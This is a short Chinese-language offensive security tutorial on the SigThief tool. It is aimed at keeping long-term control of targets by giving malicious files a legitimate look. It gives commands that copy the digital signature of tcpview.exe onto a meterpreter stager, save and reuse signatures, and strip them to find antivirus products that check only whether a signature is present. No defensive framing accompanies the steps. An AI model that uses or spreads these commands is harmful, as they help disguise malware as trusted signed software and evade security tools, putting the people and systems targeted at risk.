数字签名伪造工具

伪造签名工具

 

在实战中，尤其是需要长期控制的目标，除免杀对抗安全软件以外，还需考虑人为无 意查看恶意文件，如数字签名是否拥有。而许多安全软件，又仅仅验证是否有签名，而非验 证签名是否有效。

 

git地址：https://github.com/secretsquirrel/SigThief

 

从二进制文件获得签名并将其添加到另一个二进制文件

 

./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe

将签名保存到磁盘供以后使用

./sigthief.py -i tcpview.exe -r #ouputfile tcpview.exe_sig

#使用保存的签名数据签名

./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe

#删除签名 帮助找到重视签名而不是代码的AV

./sigthief.py -i tcpview.exe -T

#检测签名的有效性

./sigthief.py -i tcpview.exe -c

 　　

证书中所有信息一致 ，类似于程序被篡改证书失效